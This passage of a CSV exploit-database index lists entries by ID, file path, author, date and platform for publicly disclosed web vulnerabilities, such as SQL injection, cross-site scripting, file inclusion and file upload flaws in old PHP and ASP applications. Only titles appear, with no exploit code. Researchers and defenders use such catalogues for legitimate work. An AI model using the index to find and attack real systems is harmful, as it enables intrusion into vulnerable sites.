Scripting",2005-07-27,Lostmon,webapps,php, +26039,exploits/php/webapps/26039.txt,"BMForum 3.0 - 'topic.php' Cross-Site Scripting",2005-07-27,Lostmon,webapps,php, +26040,exploits/php/webapps/26040.txt,"BMForum 3.0 - 'forums.php' Cross-Site Scripting",2005-07-27,Lostmon,webapps,php, +26041,exploits/php/webapps/26041.txt,"BMForum 3.0 - 'post.php' Cross-Site Scripting",2005-07-27,Lostmon,webapps,php, +26042,exploits/php/webapps/26042.txt,"BMForum 3.0 - 'announcesys.php' Cross-Site Scripting",2005-07-27,Lostmon,webapps,php, +26043,exploits/php/webapps/26043.txt,"Clever Copy 2.0 - Private Message Unauthorized Access",2005-07-27,Lostmon,webapps,php, +26045,exploits/php/webapps/26045.txt,"phpList 2.8.12 - Admin Page SQL Injection",2005-07-28,tgo,webapps,php, +26046,exploits/cgi/webapps/26046.txt,"@Mail 4.0/4.13 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-28,Lostmon,webapps,cgi, +26047,exploits/php/webapps/26047.txt,"Easypx41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-29,FalconDeOro,webapps,php, +26048,exploits/php/webapps/26048.txt,"Easypx41 - Multiple Variable Injection Vulnerabilities",2005-07-29,FalconDeOro,webapps,php, +26049,exploits/php/webapps/26049.txt,"VBZoom 1.0/1.11 - 'profile.php?Username' Cross-Site Scripting",2005-07-29,almaster,webapps,php, +26050,exploits/php/webapps/26050.txt,"VBZoom 1.0/1.11 - 'login.php?UserID' Cross-Site Scripting",2005-07-29,almaster,webapps,php, +26051,exploits/php/webapps/26051.txt,"Kayako LiveResponse 2.0 - 'index.php?Username' Cross-Site Scripting",2005-07-30,"James Bercegay",webapps,php, +26052,exploits/php/webapps/26052.txt,"Kayako LiveResponse 2.0 - 'index.php' Calendar Feature Multiple SQL Injections",2005-07-30,"James Bercegay",webapps,php, +26053,exploits/php/webapps/26053.txt,"PluggedOut CMS 0.4.8 - 'contenttypeid' SQL Injection",2005-09-30,FalconDeOro,webapps,php, +26054,exploits/php/webapps/26054.txt,"PluggedOut CMS 0.4.8 - 'admin.php' Cross-Site Scripting",2005-09-30,FalconDeOro,webapps,php, +26055,exploits/php/webapps/26055.txt,"Ragnarok Online Control Panel 4.3.4 a - Authentication Bypass",2005-07-30,VaLiuS,webapps,php, +26056,exploits/php/webapps/26056.txt,"MySQL AB Eventum 1.x - 'view.php?id' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php, +26057,exploits/php/webapps/26057.txt,"MySQL AB Eventum 1.x - 'list.php?release' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php, +26058,exploits/php/webapps/26058.txt,"MySQL AB Eventum 1.x - 'get_jsrs_data.php?F' Cross-Site Scripting",2005-08-01,"James Bercegay",webapps,php, +26059,exploits/php/webapps/26059.txt,"PHPFreeNews 1.x - Multiple Cross-Site Scripting Vulnerabilities",2005-08-01,rgod,webapps,php, +26060,exploits/cfm/webapps/26060.txt,"AderSoftware CFBB 1.1 - 'index.cfm' Cross-Site Scripting",2005-08-01,rUnViRuS,webapps,cfm, +26061,exploits/php/webapps/26061.txt,"PHPFreeNews 1.x - Admin Login SQL Injection",2005-08-01,rgod,webapps,php, +26062,exploits/php/webapps/26062.txt,"OpenBook 1.2.2 - 'admin.php' SQL Injection",2005-08-01,SVT,webapps,php, +26063,exploits/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - 'Lost_password.php' Cross-Site Scripting",2005-08-02,"John Cobb",webapps,php, +26064,exploits/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 - 'Shop_Display_Products.php' SQL Injection",2005-08-02,"John Cobb",webapps,php, +26065,exploits/cfm/webapps/26065.txt,"Fusebox 4.1 - 'index.cfm' Cross-Site Scripting",2005-08-03,N.N.P,webapps,cfm, +26066,exploits/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",webapps,cgi, +26067,exploits/php/webapps/26067.txt,"Web Content Management - 'validsession.php?strRootpath' Cross-Site Scripting",2005-08-03,rgod,webapps,php, +26068,exploits/php/webapps/26068.txt,"Web Content Management - 'list.php?strTable' Cross-Site Scripting",2005-08-03,rgod,webapps,php, +26069,exploits/asp/webapps/26069.txt,"Naxtor E-directory 1.0 - 'Message.asp' Cross-Site Scripting",2005-08-03,basher13,webapps,asp, +26070,exploits/asp/webapps/26070.txt,"Naxtor E-directory 1.0 - 'default.asp' SQL Injection",2005-08-03,basher13,webapps,asp, +26072,exploits/php/webapps/26072.txt,"PortailPHP 2.4 - 'index.php' SQL Injection",2005-08-04,abducter_minds@yahoo.com,webapps,php, +26073,exploits/jsp/webapps/26073.txt,"Resin Application Server 4.0.36 - Source Code Disclosure",2013-06-10,LiquidWorm,webapps,jsp, +26327,exploits/php/webapps/26327.txt,"Utopia News Pro 1.1.3 - 'header.php?sitetitle' Cross-Site Scripting",2005-10-07,rgod,webapps,php, +26077,exploits/php/webapps/26077.txt,"Concrete5 CMS 5.6.1.2 - Multiple Vulnerabilities",2013-06-10,expl0i13r,webapps,php, +26297,exploits/php/webapps/26297.txt,"PHPMyFAQ 1.5.1 - Logs Unauthorized Access",2005-08-23,rgod,webapps,php, +26298,exploits/php/webapps/26298.txt,"CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting",2005-09-26,X1ngBox,webapps,php, +26079,exploits/php/webapps/26079.txt,"Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion",2005-08-05,anonymous,webapps,php, +26080,exploits/php/webapps/26080.txt,"Comdev eCommerce 3.0 - 'WCE.download.php' Directory Traversal",2005-08-05,anonymous,webapps,php, +26081,exploits/php/webapps/26081.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'dwt_editor.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,webapps,php, +26082,exploits/php/webapps/26082.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_newsletter.php?language' Cross-Site Scripting",2005-08-05,Lostmon,webapps,php, +26083,exploits/php/webapps/26083.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'sign_in.php?language' Cross-Site Scripting",2005-08-05,Lostmon,webapps,php, +26084,exploits/php/webapps/26084.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'archive.php?language' Cross-Site Scripting",2005-08-05,Lostmon,webapps,php, +26085,exploits/php/webapps/26085.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,webapps,php, +26086,exploits/php/webapps/26086.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_linklists.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,webapps,php, +26087,exploits/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'jax_calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,webapps,php, +26088,exploits/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - 'shrimp_petition.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,Lostmon,webapps,php, +26089,exploits/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - Guestbook File Client IP Disclosure",2005-08-05,Lostmon,webapps,php, +26090,exploits/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,webapps,php, +26091,exploits/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP List Disclosure",2005-08-05,Lostmon,webapps,php, +26092,exploits/php/webapps/26092.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - logfile.csv User IP Disclosure",2005-08-05,Lostmon,webapps,php, +26093,exploits/php/webapps/26093.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - formmailer.log User Sent Mail Disclosure",2005-08-05,Lostmon,webapps,php, +26094,exploits/php/webapps/26094.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP Disclosure",2005-08-05,Lostmon,webapps,php, +26095,exploits/php/webapps/26095.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 petitionbook Script - User IP Disclosure",2005-08-05,Lostmon,webapps,php, +26096,exploits/php/webapps/26096.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - suggestions.csv User IP Disclosure",2005-08-05,Lostmon,webapps,php, +26097,exploits/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - jnl_records User Database Disclosure",2005-08-05,Lostmon,webapps,php, +26098,exploits/php/webapps/26098.txt,"FlatNuke 2.5.5 - 'structure.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,webapps,php, +26099,exploits/php/webapps/26099.txt,"FlatNuke 2.5.5 - 'footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-05,rgod,webapps,php, +26102,exploits/php/webapps/26102.txt,"PHP-Fusion 4.0/5.0/6.0 - 'messages.php' SQL Injection",2005-08-06,almaster,webapps,php, +26103,exploits/php/webapps/26103.txt,"SysCP 1.2.x - Multiple Script Execution Vulnerabilities",2005-08-08,"Christopher Kunz",webapps,php, +26104,exploits/php/webapps/26104.html,"Invision Power Board 1.0.3 - Attached File Cross-Site Scripting",2005-08-08,V[i]RuS,webapps,php, +26105,exploits/php/webapps/26105.html,"E107 Website System 0.6 - Attached File Cross-Site Scripting",2005-08-08,edward11,webapps,php, +26106,exploits/php/webapps/26106.txt,"Gravity Board X 1.1 - Login SQL Injection",2005-08-08,rgod,webapps,php, +26107,exploits/asp/webapps/26107.txt,"Dvbbs 7.1/8.2 - 'dispbbs.asp?page' Cross-Site Scripting",2005-08-08,Lostmon,webapps,asp, +26108,exploits/asp/webapps/26108.txt,"Dvbbs 7.1/8.2 - 'dispuser.asp?name' Cross-Site Scripting",2005-08-08,Lostmon,webapps,asp, +26109,exploits/asp/webapps/26109.txt,"Dvbbs 7.1/8.2 - 'boardhelp.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,Lostmon,webapps,asp, +26111,exploits/php/webapps/26111.txt,"Gravity Board X 1.1 - CSS Template Unauthorized Access",2005-08-08,rgod,webapps,php, +26112,exploits/php/webapps/26112.txt,"PHP Lite Calendar Express 2.2 - 'login.php?cid' SQL Injection",2005-08-08,almaster,webapps,php, +26113,exploits/php/webapps/26113.txt,"PHP Lite Calendar Express 2.2 - 'auth.php?cid' SQL Injection",2005-08-08,almaster,webapps,php, +26114,exploits/php/webapps/26114.txt,"PHP Lite Calendar Express 2.2 - 'Subscribe.php?cid' SQL Injection",2005-08-08,almaster,webapps,php, +26115,exploits/php/webapps/26115.txt,"Calendar Express 2.2 - 'search.php' Cross-Site Scripting",2005-08-08,almaster,webapps,php, +26116,exploits/php/webapps/26116.txt,"Chipmunk CMS 1.3 - Fontcolor Cross-Site Scripting",2005-08-08,rgod,webapps,php, +26117,exploits/php/webapps/26117.txt,"FunkBoard 0.66 - 'editpost.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26118,exploits/php/webapps/26118.txt,"FunkBoard 0.66 - 'prefs.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26119,exploits/php/webapps/26119.txt,"FunkBoard 0.66 - 'newtopic.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26120,exploits/php/webapps/26120.txt,"FunkBoard 0.66 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26121,exploits/php/webapps/26121.txt,"FunkBoard 0.66 - 'profile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26122,exploits/php/webapps/26122.txt,"FunkBoard 0.66 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-08,rgod,webapps,php, +26124,exploits/php/webapps/26124.txt,"WordPress Plugin WP-SendSms 1.0 - Multiple Vulnerabilities",2013-06-11,expl0i13r,webapps,php, +26125,exploits/php/webapps/26125.txt,"Weathermap 0.97c - 'mapname' Local File Inclusion",2013-06-11,"Anthony Dubuissez",webapps,php, +26126,exploits/php/webapps/26126.txt,"NanoBB 0.7 - Multiple Vulnerabilities",2013-06-11,"CWH Underground",webapps,php, +26127,exploits/php/webapps/26127.txt,"TriggerTG TClanPortal 3.0 - Multiple SQL Injections",2005-08-09,admin@batznet.com,webapps,php, +26129,exploits/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - Cross-Site Request Forgery",2013-06-11,"Prayas Kulshrestha",webapps,hardware, +26132,exploits/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",webapps,php, +26136,exploits/php/webapps/26136.txt,"Simple PHP Agenda 2.2.8 - 'edit_event.php?eventid' SQL Injection",2013-06-11,"Anthony Dubuissez",webapps,php, +26140,exploits/php/webapps/26140.txt,"ezUpload 2.2 - 'index.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",webapps,php, +26141,exploits/php/webapps/26141.txt,"ezUpload 2.2 - 'initialize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",webapps,php, +26142,exploits/php/webapps/26142.txt,"ezUpload 2.2 - 'customize.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",webapps,php, +26143,exploits/php/webapps/26143.txt,"ezUpload 2.2 - 'form.php?path' Remote File Inclusion",2005-08-10,"Johnnie Walker",webapps,php, +26144,exploits/php/webapps/26144.txt,"PHPTB Topic Board 2.0 - 'index.php?mid' SQL Injection",2005-08-10,abducter_minds@yahoo.com,webapps,php, +26146,exploits/php/webapps/26146.txt,"VegaDNS 0.8.1/0.9.8/0.9.9 - 'index.php' Cross-Site Scripting",2005-08-10,dyn0,webapps,php, +26147,exploits/php/webapps/26147.txt,"MyBulletinBoard (MyBB) RC4 - 'Username' SQL Injection",2005-08-12,phuket,webapps,php, +26148,exploits/php/webapps/26148.txt,"MyBulletinBoard (MyBB) RC4 - 'member.php' Multiple SQL Injections",2005-08-12,phuket,webapps,php, +26149,exploits/php/webapps/26149.txt,"MyBulletinBoard (MyBB) RC4 - 'polloptions' SQL Injection",2005-08-12,phuket,webapps,php, +26150,exploits/php/webapps/26150.txt,"MyBulletinBoard (MyBB) RC4 - 'action' SQL Injection",2005-08-12,phuket,webapps,php, +26153,exploits/php/webapps/26153.txt,"My Image Gallery 1.4.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-16,anonymous,webapps,php, +26154,exploits/asp/webapps/26154.txt,"PersianBlog - 'Userslist.asp' SQL Injection",2005-08-16,trueend5,webapps,asp, +26155,exploits/php/webapps/26155.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' SQL Injection",2005-08-16,"John Cobb",webapps,php, +26156,exploits/asp/webapps/26156.txt,"CPaint 1.3 - xmlhttp Request Input Validation",2005-08-16,"Thor Larholm",webapps,asp, +26157,exploits/php/webapps/26157.txt,"ECW Shop 6.0.2 - 'index.php' Cross-Site Scripting",2005-08-16,"John Cobb",webapps,php, +26158,exploits/php/webapps/26158.txt,"Soft4e ECW-Shop 6.0.2 - 'index.php' HTML Injection",2005-08-16,"John Cobb",webapps,php, +26159,exploits/php/webapps/26159.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple SQL Injections",2005-08-17,h4cky,webapps,php, +26160,exploits/php/webapps/26160.txt,"PHPFreeNews 1.40 - 'NewsCategoryForm.php?NewsMode' Cross-Site Scripting",2005-08-17,h4cky,webapps,php, +26161,exploits/php/webapps/26161.txt,"PHPFreeNews 1.40 - 'searchresults.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-17,h4cky,webapps,php, +26162,exploits/php/webapps/26162.txt,"PHPTB Topic Board 2.0 - 'admin_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",webapps,php, +26163,exploits/php/webapps/26163.txt,"PHPTB Topic Board 2.0 - 'board_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",webapps,php, +26164,exploits/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - 'dev_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",webapps,php, +26165,exploits/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - 'file_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",webapps,php, +26166,exploits/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - 'tech_o.php?absolutepath' Remote File Inclusion",2005-08-17,"Filip Groszynski",webapps,php, +26169,exploits/php/webapps/26169.txt,"W-Agora 4.2 - 'Site' Directory Traversal",2005-08-18,matrix_killer,webapps,php, +26170,exploits/php/webapps/26170.txt,"ATutor 1.5.1 - 'login.php?course' Cross-Site Scripting",2005-08-18,matrix_killer,webapps,php, +26171,exploits/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 - 'Prod.php' Arbitrary Command Execution",2005-08-18,rgod,webapps,php, +26172,exploits/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,webapps,php, +26174,exploits/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez_ Lopez_ Castillo",webapps,hardware, +26176,exploits/php/webapps/26176.txt,"Woltlab Burning Board 2.x - 'ModCP.php' SQL Injection",2005-08-20,[R],webapps,php, +26177,exploits/php/webapps/26177.txt,"Land Down Under 800/801 - 'links.php?w' SQL Injection",2005-08-20,bl2k,webapps,php, +26178,exploits/php/webapps/26178.txt,"Land Down Under 800/801 - 'journal.php?m' SQL Injection",2005-08-20,bl2k,webapps,php, +26179,exploits/php/webapps/26179.txt,"Land Down Under 800/801 - 'list.php' Multiple SQL Injections",2005-08-20,bl2k,webapps,php, +26180,exploits/php/webapps/26180.txt,"Land Down Under 800/801 - 'forums.php' Multiple SQL Injections",2005-08-20,bl2k,webapps,php, +26181,exploits/php/webapps/26181.txt,"Land Down Under 800 - 'journal.php?w' Cross-Site Scripting",2005-08-20,bl2k,webapps,php, +26182,exploits/php/webapps/26182.txt,"Land Down Under 800 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-08-20,bl2k,webapps,php, +26183,exploits/php/webapps/26183.txt,"NEPHP 3.0.4 - 'browse.php' Cross-Site Scripting",2005-08-22,bl2k,webapps,php, +26184,exploits/php/webapps/26184.txt,"PHPKit 1.6.1 - 'member.php' SQL Injection",2005-08-22,phuket,webapps,php, +26186,exploits/php/webapps/26186.txt,"RunCMS 1.1/1.2 Module Newbb_plus/Messages - SQL Injection",2005-08-22,"James Bercegay",webapps,php, +26187,exploits/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module - 'moderate' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",webapps,php, +26188,exploits/php/webapps/26188.txt,"PostNuke 0.76 RC4b - 'user.php?htmltext' Cross-Site Scripting",2005-08-22,"Maksymilian Arciemowicz",webapps,php, +26189,exploits/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL - 'viewdownload.php' SQL Injection",2005-08-22,"Maksymilian Arciemowicz",webapps,php, +26190,exploits/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,webapps,php, +26191,exploits/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusions",2005-08-23,rgod,webapps,php, +26192,exploits/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,webapps,php, +26193,exploits/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,webapps,php, +26197,exploits/php/webapps/26197.txt,"Foojan PHPWeblog - Html Injection",2005-08-24,ali202,webapps,php, +26199,exploits/php/webapps/26199.txt,"phpMyAdmin 2.x - 'error.php' Cross-Site Scripting",2005-08-28,"Michal Cihar",webapps,php, +26200,exploits/php/webapps/26200.txt,"SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection",2005-08-29,"Jakob Balle",webapps,php, +26201,exploits/php/webapps/26201.txt,"PHPWebNotes 2.0 - 'Api.php' Remote File Inclusion",2005-08-29,nf2@scheinwelt.at,webapps,php, +26202,exploits/php/webapps/26202.txt,"Looking Glass - Cross-Site Scripting",2005-08-27,rgod,webapps,php, +26203,exploits/php/webapps/26203.php,"Looking Glass 20040427 - Remote Command Execution",2005-08-27,rgod,webapps,php, +26204,exploits/php/webapps/26204.pl,"MyBB - 'member.php' SQL Injection",2005-08-29,W7ED,webapps,php, +26205,exploits/php/webapps/26205.txt,"Land Down Under 700/701/800/801 - 'index.php?c' SQL Injection",2005-08-29,matrix_killer,webapps,php, +26206,exploits/php/webapps/26206.txt,"Land Down Under 700/701/800/801 - 'events.php?c' SQL Injection",2005-08-29,matrix_killer,webapps,php, +26207,exploits/php/webapps/26207.txt,"Land Down Under 700/701/800/801 - 'list.php' Multiple SQL Injections",2005-08-29,matrix_killer,webapps,php, +26208,exploits/php/webapps/26208.txt,"Autolinks 2.1 Pro - 'Al_initialize.php' Remote File Inclusion",2005-08-29,4Degrees,webapps,php, +26209,exploits/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,webapps,php, +26211,exploits/php/webapps/26211.txt,"phpLDAPadmin 0.9.6/0.9.7 - 'welcome.php' Arbitrary File Inclusion",2005-08-30,rgod,webapps,php, +26212,exploits/php/webapps/26212.txt,"FlatNuke 2.5.6 - 'ID' Directory Traversal",2005-08-31,rgod,webapps,php, +26213,exploits/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",webapps,php, +26215,exploits/php/webapps/26215.txt,"FlatNuke 2.5.6 - 'USR' Cross-Site Scripting",2005-08-31,rgod,webapps,php, +26217,exploits/php/webapps/26217.html,"CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion",2005-08-31,groszynskif,webapps,php, +26223,exploits/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 - 'events.php' HTML Injection",2005-09-06,conor.e.buckley,webapps,php, +26224,exploits/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 - 'Description' HTML Injection",2005-09-06,retrogod@aliceposta.it,webapps,php, +26225,exploits/php/webapps/26225.txt,"MAXdev MD-Pro 1.0.73 - Arbitrary File Upload",2005-09-06,rgod,webapps,php, +26226,exploits/php/webapps/26226.txt,"MAXdev MD-Pro 1.0.73 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-06,rgod,webapps,php, +26228,exploits/php/webapps/26228.txt,"MyBulletinBoard (MyBB) 1.0 - Multiple SQL Injections",2005-09-06,stranger-killer,webapps,php, +26229,exploits/php/webapps/26229.txt,"phpCommunityCalendar 4.0 - Multiple SQL Injections",2005-09-07,rgod,webapps,php, +26231,exploits/php/webapps/26231.txt,"PBLang 4.65 Bulletin Board System - 'SetCookie.php' Directory Traversal",2005-09-07,rgod,webapps,php, +26232,exploits/php/webapps/26232.txt,"phpCommunityCalendar 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-07,rgod,webapps,php, +26234,exploits/php/webapps/26234.txt,"Stylemotion WEB//NEWS 1.4 - 'startup.php' Cookie SQL Injection",2005-09-08,onkel_fisch,webapps,php, +26235,exploits/php/webapps/26235.txt,"Stylemotion WEB//NEWS 1.4 - 'news.php' Multiple SQL Injections",2005-09-08,onkel_fisch,webapps,php, +26236,exploits/php/webapps/26236.txt,"Stylemotion WEB//NEWS 1.4 - 'print.php?id' SQL Injection",2005-09-08,onkel_fisch,webapps,php, +26237,exploits/php/webapps/26237.txt,"AMember Pro 2.3.4 - Remote File Inclusion",2005-09-08,"NewAngels Team",webapps,php, +26240,exploits/php/webapps/26240.txt,"WordPress Plugin Ultimate WordPress Auction Plugin 1.0 - Cross-Site Request Forgery",2013-06-17,expl0i13r,webapps,php, +26241,exploits/php/webapps/26241.txt,"Fly-High CMS 2012-07-08 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",webapps,php, +26243,exploits/php/webapps/26243.txt,"Havalite CMS 1.1.7 - Unrestricted Arbitrary File Upload",2013-06-17,"CWH Underground",webapps,php, +26244,exploits/php/webapps/26244.txt,"SPBAS Business Automation Software 2012 - Multiple Vulnerabilities",2013-06-17,"Christy Philip Mathew",webapps,php, +26246,exploits/php/webapps/26246.txt,"Simple File Manager 024 - Authentication Bypass",2013-06-17,Chako,webapps,php, +26247,exploits/php/webapps/26247.txt,"MyBulletinBoard (MyBB) 1.0 - 'RateThread.php' SQL Injection",2005-09-09,stranger-killer,webapps,php, +40300,exploits/php/webapps/40300.py,"HelpDeskZ 1.0.2 - Unauthenticated Arbitrary File Upload",2016-08-29,"Lars Morgenroth",webapps,php,80 +26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php, +26253,exploits/php/webapps/26253.txt,"Land Down Under 800/801 - 'auth.php?m' SQL Injection",2005-09-13,"GroundZero Security Research",webapps,php, +26254,exploits/php/webapps/26254.txt,"Land Down Under 800/801 - 'plug.php?e' SQL Injection",2005-09-13,"GroundZero Security Research",webapps,php, +26255,exploits/php/webapps/26255.php,"Mail-it Now! Upload2Server 1.5 - Arbitrary File Upload",2005-09-13,rgod,webapps,php, +26256,exploits/cgi/webapps/26256.txt,"MIVA Merchant 5 - Merchant.MVC Cross-Site Scripting",2005-09-14,admin@hyperconx.com,webapps,cgi, +26257,exploits/php/webapps/26257.txt,"ATutor 1.5.1 - 'password_reminder.php' SQL Injection",2005-09-14,rgod,webapps,php, +26258,exploits/php/webapps/26258.txt,"ATutor 1.5.1 - Chat Logs Remote Information Disclosure",2005-09-14,rgod,webapps,php, +26259,exploits/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - 'index.php' SQL Injection",2005-09-14,trueend5,webapps,php, +26260,exploits/php/webapps/26260.txt,"TWiki TWikiUsers - Arbitrary Command Execution",2005-09-14,B4dP4nd4,webapps,php, +26261,exploits/php/webapps/26261.txt,"Noah's Classifieds 1.3 - 'index.php' Cross-Site Scripting",2005-09-14,trueend5,webapps,php, +26262,exploits/php/webapps/26262.txt,"Digital Scribe 1.4 - Login SQL Injection",2005-09-15,rgod,webapps,php, +26263,exploits/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection",2005-09-15,alexsrb,webapps,php, +26264,exploits/php/webapps/26264.txt,"DeluxeBB 1.0 - 'topic.php' SQL Injection",2005-09-15,abducter,webapps,php, +26265,exploits/php/webapps/26265.txt,"DeluxeBB 1.0 - 'misc.php' SQL Injection",2005-09-15,abducter,webapps,php, +26266,exploits/php/webapps/26266.txt,"DeluxeBB 1.0 - 'forums.php' SQL Injection",2005-09-15,abducter,webapps,php, +26267,exploits/php/webapps/26267.txt,"DeluxeBB 1.0 - 'pm.php' SQL Injection",2005-09-15,abducter,webapps,php, +26268,exploits/php/webapps/26268.txt,"DeluxeBB 1.0 - 'newpost.php' SQL Injection",2005-09-15,abducter,webapps,php, +26333,exploits/asp/webapps/26333.html,"Aenovo - '/Password/default.asp?Password' SQL Injection",2005-10-07,"farhad koosha",webapps,asp, +26334,exploits/asp/webapps/26334.txt,"Aenovo - '/incs/searchdisplay.asp?strSQL' SQL Injection",2005-10-07,"farhad koosha",webapps,asp, +26270,exploits/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",webapps,php, +26272,exploits/php/webapps/26272.txt,"EPay Pro 2.0 - 'index.php' Directory Traversal",2005-09-19,h4cky0u,webapps,php, +26273,exploits/php/webapps/26273.txt,"vBulletin 1.0.1 lite/2.x/3.0 - 'joinrequests.php?request' SQL Injection",2005-09-19,deluxe@security-project.org,webapps,php, +26274,exploits/php/webapps/26274.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php' Multiple SQL Injections",2005-09-19,deluxe@security-project.org,webapps,php, +26275,exploits/php/webapps/26275.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertitle.php?usertitleid' SQL Injection",2005-09-19,deluxe@security-project.org,webapps,php, +26276,exploits/php/webapps/26276.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/usertools.php?ids' SQL Injection",2005-09-19,deluxe@security-project.org,webapps,php, +26277,exploits/php/webapps/26277.txt,"NooToplist 1.0 - 'index.php' Multiple SQL Injections",2005-09-19,"David Sopas Ferreira",webapps,php, +26278,exploits/php/webapps/26278.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/css.php?group' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,webapps,php, +26279,exploits/php/webapps/26279.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-09-19,deluxe@security-project.org,webapps,php, +26280,exploits/php/webapps/26280.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/user.php?email' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,webapps,php, +26281,exploits/php/webapps/26281.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/language.php?goto' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,webapps,php, +26282,exploits/php/webapps/26282.txt,"vBulletin 1.0.1 lite/2.x/3.0 - '/admincp/modlog.php?orderby' Cross-Site Scripting",2005-09-19,deluxe@security-project.org,webapps,php, 